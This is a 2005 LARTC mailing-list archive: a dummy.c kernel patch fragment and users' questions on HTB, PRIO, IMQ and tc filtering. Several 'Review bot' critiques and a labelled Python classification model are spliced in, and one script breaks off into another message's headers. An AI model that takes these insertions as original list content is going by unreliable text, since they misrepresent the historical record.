__u32 from = G_TC_FROM(skb->tc_verd); + + skb->tc_verd = 0; + skb->tc_verd = SET_TC_NCLS(skb->tc_verd); + stats->tx_packets++; + stats->tx_bytes+=skb->len; + if (from & AT_EGRESS) { + dp->stat_r6 +=1; + dev_queue_xmit(skb); + } else if (from & AT_INGRESS) { + + dp->stat_r7 +=1; + netif_rx(skb); + } else { + /* if netfilt is compiled in and packet is + tagged, we could reinject the packet back + this would make it do remaining 10% + of what current IMQ does + if someone really really insists then + this is the spot .. jhs */ + dev_kfree_skb(skb); + stats->tx_dropped++; + } + } + + if (spin_trylock(&dv->xmit_lock)) { + dp->stat_r3 +=1; + if (NULL == (skb = skb_peek(&dp->rq))) { + dp->tasklet_pending = 0; + if (netif_queue_stopped(dv)) + //netif_start_queue(dv); + netif_wake_queue(dv); + } else { + dp->stat_r2 +=1; + spin_unlock(&dv->xmit_lock); + goto resched; + } + spin_unlock(&dv->xmit_lock); + } else { +resched: + dp->tasklet_pending = 1; + tasklet_schedule(&dp->dummy_tasklet); + } + +} +#endif static int dummy_set_address(struct net_device *dev, void *p) { @@ -62,12 +186,17 @@ /* Initialize the device structure. */ dev->get_stats = dummy_get_stats; dev->hard_start_xmit = dummy_xmit; + dev->tx_timeout = &dummy_timeout; + dev->watchdog_timeo = TX_TIMEOUT; + dev->open = &dummy_open; + dev->stop = &dummy_close; + dev->set_multicast_list = set_multicast_list; dev->set_mac_address = dummy_set_address; /* Fill in device structure with ethernet-generic values. */ ether_setup(dev); - dev->tx_queue_len = 0; + dev->tx_queue_len = TX_Q_LIMIT; dev->change_mtu = NULL; dev->flags |= IFF_NOARP; dev->flags &= ~IFF_MULTICAST; 
@@ -77,18 +206,64 @@ static int dummy_xmit(struct sk_buff *skb, struct net_device *dev) { - struct net_device_stats *stats = netdev_priv(dev); + struct dummy_private *dp = ((struct net_device *)dev)->priv; + struct net_device_stats *stats = &dp->stats; + int ret = 0; + { stats->tx_packets++; stats->tx_bytes+=skb->len; + } +#ifdef CONFIG_NET_CLS_ACT + __u32 from = G_TC_FROM(skb->tc_verd); + if (!from || !skb->input_dev ) { +dropped: + dev_kfree_skb(skb); + stats->rx_dropped++; + return ret; + } else { + if (skb->input_dev) + skb->dev = skb->input_dev; + else + printk("warning!!! no idev %s\n",skb->dev->name); + skb->input_dev = dev; + if (from & AT_INGRESS) { + skb_pull(skb, skb->dev->hard_header_len); + } else { + if (!(from & AT_EGRESS)) { + goto dropped; + } + } + } + if (skb_queue_len(&dp->rq) >= dev->tx_queue_len) { + netif_stop_queue(dev); + } + dev->trans_start = jiffies; + skb_queue_tail(&dp->rq, skb); + if (!dp->tasklet_pending) { + dp->tasklet_pending = 1; + tasklet_schedule(&dp->dummy_tasklet); + } + +#else + stats->rx_dropped++; dev_kfree_skb(skb); - return 0; +#endif + return ret; } static struct net_device_stats *dummy_get_stats(struct net_device *dev) { - return netdev_priv(dev); + struct dummy_private *dp = ((struct net_device *)dev)->priv; + struct net_device_stats *stats = &dp->stats; +#ifdef CONFIG_NET_CLS_ACT_DEB + printk("tasklets stats %ld:%ld:%ld:%ld:%ld:%ld:%ld:%ld \n", + dp->stat_r1,dp->stat_r2,dp->stat_r3,dp->stat_r4, + dp->stat_r5,dp->stat_r6,dp->stat_r7,dp->stat_r8); +#endif + + return stats; } static struct net_device **dummies; 
@@ -97,12 +272,41 @@ module_param(numdummies, int, 0); MODULE_PARM_DESC(numdummies, "Number of dummy pseudo devices"); +static int dummy_close(struct net_device *dev) +{ + +#ifdef CONFIG_NET_CLS_ACT + struct dummy_private *dp = ((struct net_device *)dev)->priv; + + tasklet_kill(&dp->dummy_tasklet); + skb_queue_purge(&dp->rq); + skb_queue_purge(&dp->tq); +#endif + netif_stop_queue(dev); + return 0; +} + +static int dummy_open(struct net_device *dev) +{ + +#ifdef CONFIG_NET_CLS_ACT + struct dummy_private *dp = ((struct net_device *)dev)->priv; + + tasklet_init(&dp->dummy_tasklet, ri_tasklet, (unsigned long)dev); + skb_queue_head_init(&dp->rq); + skb_queue_head_init(&dp->tq); +#endif + netif_start_queue(dev); + return 0; +} + + static int __init dummy_init_one(int index) { struct net_device *dev_dummy; int err; - dev_dummy = alloc_netdev(sizeof(struct net_device_stats), + dev_dummy = alloc_netdev(sizeof(struct dummy_private), "dummy%d", dummy_setup); if (!dev_dummy) --=-69HkpMiEza1wGz3le8L6-- --------------080201070107030308040008-- From nug@sch.bme.hu Mon Jan 31 05:57:50 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Mon, 31 Jan 2005 06:57:50 +0100 Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)? In-Reply-To: <12de31ea.c71146d0.94fbe00@expms5.cites.uiuc.edu> References: <12de31ea.c71146d0.94fbe00@expms5.cites.uiuc.edu> Message-ID: <41FDC8DE.9080707@sch.bme.hu> Hi! Steven Y. Ko wrote: > Hi, > > I'm wondering if there's any simple solution. This problem > looks very simple, so maybe there's a simple solution that > I'm missing, but I couldn't do it yet. > > I'm configuring an wireless ad-hoc network with three > laptops; > > A ---- B ---- C > > > B cannot forward packets with this routing table. Is there > any solution? Maybe: # ip forward is a must for a gateway echo "1" > /proc/sys/net/ipv4/ip_forward -- Udv, Nandor From nug@sch.bme.hu Mon Jan 31 06:01:04 2005 
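Review bot: in the dummy_xmit() hunk of the drivers/net/dummy.c patch above, the branch "else printk("warning!!! no idev %s\n",skb->dev->name);" can never run, because "if (!from || !skb->input_dev )" has already sent every skb without an input_dev to the dropped: label. Drop the inner "if (skb->input_dev)" test and assign skb->dev = skb->input_dev unconditionally. The declaration "__u32 from = G_TC_FROM(skb->tc_verd);" also comes after statements inside the #ifdef; move it up with the other locals.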
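Review bot: ri_tasklet() in the same dummy.c patch increments stats->tx_packets and stats->tx_bytes for each skb it dequeues from dp->tq, but dummy_xmit() has already counted that skb before queueing it on dp->rq, so every redirected packet is counted twice as transmitted. Count in one place only. dp->tasklet_pending is also written from both dummy_xmit() and the tasklet with no lock or atomic operation visible in the patch, and the stat_r1 to stat_r8 counters and the commented-out "//netif_start_queue(dv);" line are debug leftovers that should go before merging.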
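Review bot: dummy_close() in the last hunk of the dummy.c patch calls tasklet_kill() and purges dp->rq and dp->tq before it calls netif_stop_queue(dev), so dummy_xmit() can still queue an skb and call tasklet_schedule() after the tasklet has been killed. Stop the queue first, then kill the tasklet and purge both queues.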
From: nug@sch.bme.hu (Tóth Nándor)
Date: Mon, 31 Jan 2005 07:01:04 +0100
Subject: [LARTC] Problem with tcng
In-Reply-To: <18620.1107133161@www22.gmx.net>
References: <18620.1107133161@www22.gmx.net>
Message-ID: <41FDC9A0.1000708@sch.bme.hu>

Hi!

Marcus Schäfer wrote:
> Hi folks,
>
> first of all, sorry for my bad English ^^ and for the fact that I am a Linux
> N00b.
>
> I have a little Problem installing TCng on my Debian System. At the make
> install command the following error occured:
>
> tar: lib/tcng/include/klib/kernel/include: Cannot stat: no such file or
> directory
> tar: Error exit delayed from previous errors
>
> Can somebody help me ?

Maybe:
http://www.google.co.hu/search?q=tcng+debian&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official
-->
http://talk.trekweb.com/~jasonb/articles/tcng_shaping.html

--
Udv, Nandor

From rsenykoff@harrislogic.com Mon Jan 31 06:05:51 2005
From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com)
Date: Mon, 31 Jan 2005 00:05:51 -0600
Subject: [LARTC] PRIO inside HTB - trouble attaching filters correctly?
In-Reply-To:
Message-ID:

Hello everyone!

I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got interactive traffic on the network that I want to give priority (VoIP + Citrix + Video).

I've used the filters in a CBQ script fine, but am having trouble adjusting them to this setup such that they properly assign the traffic.

tc qdisc del root dev $e

tc qdisc add dev $e root handle 1: htb default 3

tc class add dev $e parent 1: classid 1:1 htb rate $wanRate

# now that we've throttled the interface, we create the PRIO queue
tc qdisc add dev $e parent 1:1 handle 10: prio
# instantly creates classes 10:1, 10:2, 10:3

tc qdisc add dev $e parent 10:1 handle 1: pfifo
tc qdisc add dev $e parent 10:2 handle 2: pfifo
tc qdisc add dev $e parent 10:3 handle 3: sfq

Fixed! The problem is that htb was not seeing any of the rules that I applied to the lower stuff, so it wasn't forwarding traffic there.

The fix:

tc qdisc add dev $e root handle 1: htb default 1

By saying default 1, all htb traffic gets forwarded to classid 1:1, which has the PRIO queue attached.

-Ron

From don-lartcxx@isis.cs3-inc.com Mon Jan 31 07:24:16 2005
From: don-lartcxx@isis.cs3-inc.com (Don Cohen)
Date: Sun, 30 Jan 2005 23:24:16 -0800
Subject: [LARTC] facilities to output to monitoring interfaces
In-Reply-To: <20050131060425.32096.54161.Mailman@outpost.ds9a.nl>
References: <20050131060425.32096.54161.Mailman@outpost.ds9a.nl>
Message-ID: <16893.56608.688927.473035@isis.cs3-inc.com>

How can one copy packets to a monitoring interface? For a start I'd like to know how to just copy all of those that arrive on eth1 out to eth2 in addition to whatever else would normally happen to them.

After that, a number of interesting possibilities:
- Copy only those with specified properties. (I suppose a random probability of copying fits into this category.)
- Copy only those that are actually sent (so if the packet is dropped anywhere along the way there's no "false positive").
- Copy only part of the packet, say, only the first 64 bytes.
- Extract specified parts of packets and collect the results into larger packets that hold the data for many of the original packets.

From George Alexandru Dragoi Mon Jan 31 09:31:02 2005
From: George Alexandru Dragoi (George Alexandru Dragoi)
Date: Mon, 31 Jan 2005 11:31:02 +0200
Subject: [LARTC] Question about filters
Message-ID: <3063e505013101311375c1a@mail.gmail.com>

Hello, I need to do the following: make a htb qdisc with its class of 70mbit, then add some classes, one of 10mbit, another of 10mbit, one of 5mbit and the rest in last class (with also child classes). The 5mbit class is a guaranteed one, and it is marked with a special dscp. I will add an HFSC qdisc on this one, and then several classes to it. When i add filters, what should i use as parent to say the traffic should go to a HFSC class inside the 5mbit qdisc, or to the 10mbit class or to the children of last class?

From Denis Kot Mon Jan 31 09:43:36 2005
From: Denis Kot (Denis Kot)
Date: Mon, 31 Jan 2005 11:43:36 +0200
Subject: [LARTC] why there is any traffic in default class?
Message-ID: <3cfad9ca05013101435f72a4d9@mail.gmail.com>

I have:

tc qdisc add dev imq0 root handle 1: htb default 30
tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit

then:

iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0
tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit
tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22

so, as I understand any traffic from source 192.168.2.2 and from interface ppp0 must be going directly in to class 1:22, so default class 30 must not have any traffic. isn´t it?

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From nug@sch.bme.hu Mon Jan 31 09:55:53 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Mon, 31 Jan 2005 10:55:53 +0100
Subject: [LARTC] why there is any traffic in default class?
In-Reply-To: <3cfad9ca05013101435f72a4d9@mail.gmail.com>
References: <3cfad9ca05013101435f72a4d9@mail.gmail.com>
Message-ID: <41FE00A9.6050004@sch.bme.hu>

Hi!

Denis Kot wrote:
> I have:
>
> tc qdisc add dev imq0 root handle 1: htb default 30
> tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
> tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit
>
> then:
>
> iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0

If i understand you correctly, it should be:
iptables -t mangle -A PREROUTING -i ppp0 -j IMQ --todev 0
iptables -t mangle -A PREROUTING -s 192.168.2.2 -j IMQ --todev 0

Your rule means: traffic which came from ppp0 AND has source ip 192.168.2.2 go to IMQ.

> tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit
> tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src
> 192.168.2.2 flowid 1:22
>
> so, as I understand any traffic from source 192.168.2.2 and from
> interface ppp0 must be going directly in to class 1:22, so default
> class 30 must not have any traffic. isn´t it?

This part may or may not be ok, i do not know.

--
Udv,
Nandor

From Denis Kot Mon Jan 31 10:11:12 2005
From: Denis Kot (Denis Kot)
Date: Mon, 31 Jan 2005 12:11:12 +0200
Subject: [LARTC] why there is any traffic in default class?
In-Reply-To: <41FE00A9.6050004@sch.bme.hu>
References: <3cfad9ca05013101435f72a4d9@mail.gmail.com> <41FE00A9.6050004@sch.bme.hu>
Message-ID: <3cfad9ca05013102118860b0@mail.gmail.com>

my rules is right, cause ppp0 is vpn client who has (applied by pppd) ip 192.168.2.2. so I want any traffic from ppp0 AND 192.168.2.2 route to class 1:22

On Mon, 31 Jan 2005 10:55:53 +0100, Tóth Nándor wrote:
> Hi!
>
> Denis Kot wrote:
> > I have:
> >
> > tc qdisc add dev imq0 root handle 1: htb default 30
> > tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
> > tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit
> >
> > then:
> >
> > iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0
>
> If i understand you correctly, it should be:
> iptables -t mangle -A PREROUTING -i ppp0 -j IMQ --todev 0
> iptables -t mangle -A PREROUTING -s 192.168.2.2 -j IMQ --todev 0
>
> Your rule means: traffic which came from ppp0 AND has source ip
> 192.168.2.2 go to IMQ.
>
> > tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit
> > tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src
> > 192.168.2.2 flowid 1:22
> >
> > so, as I understand any traffic from source 192.168.2.2 and from
> > interface ppp0 must be going directly in to class 1:22, so default
> > class 30 must not have any traffic. isn´t it?
>
> This part may or may not be ok, i do not know.
>
> --
> Udv,
> Nandor
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From jesper@ballbreaker.dk Mon Jan 31 11:32:28 2005
From: jesper@ballbreaker.dk (Jesper Lund)
Date: Mon, 31 Jan 2005 12:32:28 +0100
Subject: [LARTC] tc segmentation faults when trying to add pfifo_fast as leaf discipline on a HTB class
Message-ID: <20050131123228.455f6bc2.jesper@ballbreaker.dk>

Hello

I am trying to attach pfifo_fast to a leaf htb class. But tc segmentation faults. If I try the failing command through strace, it shows me that the last thing tc tries to do just before the segmentation fault, is to try to open a file called "/usr/lib/tc/q_pfifo_fast.so".

Of course i have tried to find worthwhile information around the Internet, but haven't found anything useful. Is pfifo_fast meant to be used *only* as a default qdisc on an interface ? Or can I use it as a qdisc in a HTB class ?

I don't know what useful information you want about my setup, but i don't think that you need to know about it... :) Otherwise I will try to explain more, on request.

Regards,
Jesper Lund

From askar@askarali.info Mon Jan 31 12:48:16 2005
From: askar@askarali.info (Askar)
Date: Mon, 31 Jan 2005 17:48:16 +0500
Subject: [LARTC] load balancing between two default gateways
Message-ID: <41FE2910.90908@askarali.info>

Hi list gurus,

long story short we have firewall machine which is the default gateway for our clients and firewall send traffic out to Internet via cisco router. On cisco we have two serial interfaces 1Mb and 2Mb.

On firewall
#route add default gw xxx.xxx.xx.xxx (for 2mb)
#route add default gw xxx.xxx.xx.xxx (for 1mb)

and the same rule for 1mb link route packets via these two links.

However I don't know what kernel do when sending traffic via these two "default routes" however im sure kernel not doing some sorta shaping, coz after few hours of these two rules our 1mb link got choked and we have to "route delete default gw xxx.xxx.xx (1mb).

Now what I want may be "shaping" to route 70% traffic via 2Mb and 30 via 1Mb.
Is this possible via iproute2? if yes I will greatly appreciate if someone helps newbie to iproute2 :)

regards
Askar

From Denis Kot Mon Jan 31 13:06:11 2005
From: Denis Kot (Denis Kot)
Date: Mon, 31 Jan 2005 15:06:11 +0200
Subject: [LARTC] traffic in default class
Message-ID: <3cfad9ca05013105066d5b357c@mail.gmail.com>

how to see which packets is going in to default class?

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From jesper@ballbreaker.dk Mon Jan 31 13:48:18 2005
From: jesper@ballbreaker.dk (Jesper Lund)
Date: Mon, 31 Jan 2005 14:48:18 +0100
Subject: [LARTC] load balancing between two default gateways
In-Reply-To: <41FE2910.90908@askarali.info>
References: <41FE2910.90908@askarali.info>
Message-ID: <20050131144818.2695e935.jesper@ballbreaker.dk>

> Now what I want may be "shaping" to route 70% traffic via 2Mb and
> 30 via 1Mb.
> Is this possible via iproute2? if yes I will greatly appreciate if
> someone helps newbie to iproute2 :)

You can read the multipath routing section on lartc.org - Click on "Dive in" :)

/Jesper

From andre.correa@pobox.com Mon Jan 31 13:55:36 2005
From: andre.correa@pobox.com (Andre Correa)
Date: Mon, 31 Jan 2005 11:55:36 -0200
Subject: [LARTC] simple questions about imq
In-Reply-To: <41FD1304.1080305@sch.bme.hu>
References: <41FD1304.1080305@sch.bme.hu>
Message-ID: <41FE38D8.7070506@pobox.com>

Cool Toth, please let us know if you make it work. Just take care to hook IMQ in the right place if you are doing NAT. You can choose to hook it after or before NAT.

Good luck!

Andre

Tóth Nándor wrote:
> Hi!
>
> I have read all informations i could find, but some things are still not
> clear.
>
> My setup is:
> ---INTERNET1(eth0)-\    /- Local net1 (eth2)
>                     GW
> ---INTERNET2(eth1)-/    \- Local net2 (eth3)
>
> I have NAT and a working setup using HTB,SFQ, classifying with the
> iptables -j CLASSIFY way. I shape only the traffic coming from the
> internet heading to the intranet.
>
> I would like to have a configuration like this:
> ---INTERNET1(eth0)-\          /- Local net1 (eth2)
>                     GW--imq0
> ---INTERNET2(eth1)-/          \- Local net2 (eth3)
>
> I think it can be done this way:
> iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0
> iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0
>
> But it would include traffic heading to the gateway directly, wouldn't
> it? Can i put these rules to the POSTROUTING chain?
>
> And i can still have my CLASSIFY targets in the POSTROUTING chain,
> because IMQ queing will happen after it according to
> http://lartc.org/howto/lartc.imq.html.
> So for example:
> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY --set-class
> 1:30
> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY --set-class
> 1:30
> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN
> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN
>
> If i managed to do this, i promise, i will document it to the imq wiki.
>
> Any advice/help is appreciated!
>

From Denis Kot Mon Jan 31 14:04:38 2005
From: Denis Kot (Denis Kot)
Date: Mon, 31 Jan 2005 16:04:38 +0200
Subject: [LARTC] traffic in default class
In-Reply-To: <20050131144907.596b412a.jesper@ballbreaker.dk>
References: <3cfad9ca05013105066d5b357c@mail.gmail.com> <20050131144907.596b412a.jesper@ballbreaker.dk>
Message-ID: <3cfad9ca05013106044128e628@mail.gmail.com>

as I wrote before (in another message to list):

tc qdisc add dev imq0 root handle 1: htb default 30
tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit

then:

iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0
tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit
tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22

so how to see which packets is going in to default class?

On Mon, 31 Jan 2005 14:49:07 +0100, Jesper Lund wrote:
> > how to see which packets is going in to default class?
>
> Depends on how you filter packets, tc ? iptables ? MARK ? CLASSIFY ?
>
> /Jesper
>

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From stef.coene@docum.org Mon Jan 31 16:15:15 2005
From: stef.coene@docum.org (Stef Coene)
Date: Mon, 31 Jan 2005 17:15:15 +0100
Subject: [LARTC] Anyone have the userguide's tc script and the corresponding ethloop input files?
In-Reply-To: <20050131032629.71345.qmail@web15507.mail.cnb.yahoo.com>
References: <20050131032629.71345.qmail@web15507.mail.cnb.yahoo.com>
Message-ID: <200501311715.15302.stef.coene@docum.org>

On Monday 31 January 2005 04:26, CcM wrote:
> I'm trying to get picture from ethloop and gnuplot. But the output seems
> weird. I still do not know why and want some examples.
>
> Thanks in advance.

This is the only script I found. It uses monitor.pl that I use to get the counters. But you can also see the original code from Devik in comments that uses ethloop. I hope this will help you.

burst.sh is a script that creates the tc setup I want to test. client1 and client2 are actually ttcp commands to generate traffic.

So the script launches 2 programs to generate traffic, monitor.pl to get some counters, kills the running ttcp programs, parse the output and use gnuplot to plot it.

# set -x
CEIL="1000kbps"
./burst.sh $CEIL
(sleep 3 ; ./client1 ) &
(sleep 6 ; ./client2 ) &
monitor.pl end=30 sleep=500000
kill `ps -ef | grep ttcp | awk '{print $3}'`
kill `ps -ef | grep ttcp | awk '{print $2}'`
DATA=/tmp/bb_speed.log
PIX="OUT.png"
#DATA=$1.out
#PROG=$1
#PIX=$2.png
#if [ "$2" = "" ]; then PIX=$1.png; fi
#ethloop < $1 > $1.out
#cat >.plotperl <<"EOF"
#$ln=0; $lx=-1000;
#while (<>) {
#if(/^(\d+)\s+R\s+(\d+)\s+(\d+)/) {
#$x = $1/1000; $y = -0.1; $y1 = $y+0.02; $y2 = $y + 0.05;
#if ($x-$lx<2) { $ln=($ln+1)%3; } else { $ln=0; }
#$y-=$ln*0.04; $lx=$x; $lb=$3;
#$lb=int($3/1000)."k" if ($lb>=10000);
#print "set label '$2:$lb' at $x,graph $y center\n";
#print "set arrow from $x,graph $y1 to $x,graph $y2\n";
#}
#}
#EOF
#perl .plotperl $PROG > .plot
cat >.plot < References: Message-ID: <200501311716.59454.stef.coene@docum.org>

On Sunday 30 January 2005 16:00, rsenykoff@harrislogic.com wrote:
> Hello everyone!
>
> I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got
> interactive traffic on the network that I want to give priority (VoIP +
> Citrix + Video).
>
> I've used the filters in a CBQ script fine, but am having trouble
> adjusting them to this setup such that they properly assign the traffic.
>
> tc qdisc del root dev $e
>
> tc qdisc add dev $e root handle 1: htb default 3
>
> tc class add dev $e parent 1: classid 1:1 htb rate $wanRate
>
> # now that we've throttled the interface, we create the PRIO queue
> tc qdisc add dev $e parent 1:1 handle 10: prio
> # instantly creates classes 10:1, 10:2, 10:3
>
> tc qdisc add dev $e parent 10:1 handle 1: pfifo
> tc qdisc add dev $e parent 10:2 handle 2: pfifo
> tc qdisc add dev $e parent 10:3 handle 3: sfq
>
> ############### VoIP ################
>
> # IAX # this is the old format - IAX2 should be what's really seen going
> on
> tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 5036
> 0xffff flowid 10:1
> tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 5036
> 0xffff flowid 10:1
>
> # IAX2 #
> tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip sport 4569
> 0xffff flowid 10:1
> tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip dport 4569
> 0xffff flowid 10:1
>
> # match icmp echo request
> tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type
> 0x08 0xff flowid 10:1
>
> # match icmp echo reply
> tc filter add dev $e protocol ip parent 10: prio 1 u32 match ip icmp_type
> 0x00 0xff flowid 10:1
>
> ## etc...........

Where do you redirect the traffic to the prio qdisc ??????

Stef

From sko@uiuc.edu Mon Jan 31 16:49:14 2005
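Why `default 3` sent nothing to the PRIO qdisc while `default 1` does, as an added Python model that is not code from the thread: the filters sit on 10:, so a packet only reaches them if the root HTB first hands it to class 1:1. The model is a simplification (it ignores skb priority and reduces the PRIO priomap to band 10:2 for unmatched packets); handles, class ids and ports are the ones in the posts above.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class Filter:
    match: Dict[str, int]   # header field -> value that must be equal
    flowid: str             # class selected when every field matches


@dataclass
class Qdisc:
    handle: str                              # e.g. "1:" or "10:"
    kind: str                                # "htb" or "prio"
    default: Optional[str] = None            # HTB only: class for unmatched packets
    filters: List[Filter] = field(default_factory=list)
    # classid -> qdisc attached to that class (None = leaf qdisc not modelled)
    classes: Dict[str, Optional["Qdisc"]] = field(default_factory=dict)


def first_match(qdisc: Qdisc, packet: Dict[str, int]) -> Optional[str]:
    """Return the flowid of the first filter on this qdisc that matches."""
    for flt in qdisc.filters:
        if all(packet.get(k) == v for k, v in flt.match.items()):
            return flt.flowid
    return None


def classify(root: Qdisc, packet: Dict[str, int]) -> List[str]:
    """Walk the tree the way enqueue does: each qdisc consults only its OWN filters."""
    path = [root.handle]
    qdisc: Optional[Qdisc] = root
    while qdisc is not None:
        classid = first_match(qdisc, packet)
        if classid is None and qdisc.kind == "htb":
            classid = qdisc.default
            if classid not in qdisc.classes:
                # HTB: a default that names no existing class means the packet
                # skips every class and leaves unshaped.
                return path + ["direct (unshaped)"]
        elif classid is None:
            classid = qdisc.handle + "2"     # simplified PRIO fallback band
        path.append(classid)
        qdisc = qdisc.classes.get(classid)
        if qdisc is not None:
            path.append(qdisc.handle)
    return path


def build_tree(default_minor: int) -> Qdisc:
    """Root HTB 1: with class 1:1, PRIO 10: under it, VoIP filters on 10:."""
    prio = Qdisc(
        "10:", "prio",
        filters=[
            Filter({"sport": 5036}, "10:1"), Filter({"dport": 5036}, "10:1"),  # IAX
            Filter({"sport": 4569}, "10:1"), Filter({"dport": 4569}, "10:1"),  # IAX2
        ],
        classes={"10:1": None, "10:2": None, "10:3": None},
    )
    return Qdisc("1:", "htb", default="1:%d" % default_minor, classes={"1:1": prio})


if __name__ == "__main__":
    iax2 = {"sport": 40000, "dport": 4569}   # constructed sample packets
    web = {"sport": 40001, "dport": 80}
    for minor in (3, 1):
        tree = build_tree(minor)
        print("htb default %d: IAX2 -> %s" % (minor, " -> ".join(classify(tree, iax2))))
        print("htb default %d: web  -> %s" % (minor, " -> ".join(classify(tree, web))))
```
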
From: sko@uiuc.edu (Steven Y. Ko)
Date: Mon, 31 Jan 2005 10:49:14 -0600
Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)?
Message-ID:

> Maybe:
> # ip forward is a must for a gateway
> echo "1" > /proc/sys/net/ipv4/ip_forward

I'm sorry that I forgot mentioning that I turned it on. Also there's no firewall, either. Thank you so much for your answer, though. I'm still figuring out how to do it.

- Steve

From nug@sch.bme.hu Mon Jan 31 16:59:24 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Mon, 31 Jan 2005 17:59:24 +0100
Subject: [LARTC] simple questions about imq
In-Reply-To: <41FE38D8.7070506@pobox.com>
References: <41FD1304.1080305@sch.bme.hu> <41FE38D8.7070506@pobox.com>
Message-ID: <41FE63EC.4090806@sch.bme.hu>

Hi!

Andre Correa wrote:
>
> Cool Toth, please let us know if you make it work. Just take care to
> hook IMQ in the right place if you are doing NAT. You can choose to hook
> it after or before NAT.

Where can i set it?
Can you answer my questions below?

I will document these things, if i managed to do it.

--
Udv,
Nandor

> Tóth Nándor wrote:
>
>> Hi!
>>
>> I have read all informations i could find, but some things are still
>> not clear.
>>
>> My setup is:
>> ---INTERNET1(eth0)-\    /- Local net1 (eth2)
>>                     GW
>> ---INTERNET2(eth1)-/    \- Local net2 (eth3)
>>
>> I have NAT and a working setup using HTB,SFQ, classifying with the
>> iptables -j CLASSIFY way. I shape only the traffic coming from the
>> internet heading to the intranet.
>>
>> I would like to have a configuration like this:
>> ---INTERNET1(eth0)-\          /- Local net1 (eth2)
>>                     GW--imq0
>> ---INTERNET2(eth1)-/          \- Local net2 (eth3)
>>
>> I think it can be done this way:
>> iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0
>> iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0
>>
>> But it would include traffic heading to the gateway directly, wouldn't
>> it? Can i put these rules to the POSTROUTING chain?
>>
>> And i can still have my CLASSIFY targets in the POSTROUTING chain,
>> because IMQ queing will happen after it according to
>> http://lartc.org/howto/lartc.imq.html.
>> So for example:
>> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY
>> --set-class 1:30
>> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY
>> --set-class 1:30
>> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN
>> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN
>>
>> If i managed to do this, i promise, i will document it to the imq wiki.
>>
>> Any advice/help is appreciated!
>>
>

From nug@sch.bme.hu Mon Jan 31 17:02:32 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Mon, 31 Jan 2005 18:02:32 +0100
Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)?
In-Reply-To:
References:
Message-ID: <41FE64A8.8010408@sch.bme.hu>

Hi!

Steven Y. Ko wrote:
>>Maybe:
>># ip forward is a must for a gateway
>>echo "1" > /proc/sys/net/ipv4/ip_forward
>
>
> I'm sorry that I forgot mentioning that I turned it on. Also
> there's no firewall, either. Thank you so much for your
> answer, though. I'm still figuring out how to do it.

It should work. If i were you, i would play with tcpdump a little bit, to narrow where the problem is.

--
Udv,
Nandor

From andre.correa@pobox.com Mon Jan 31 17:10:33 2005
From: andre.correa@pobox.com (Andre Correa)
Date: Mon, 31 Jan 2005 15:10:33 -0200
Subject: [LARTC] simple questions about imq
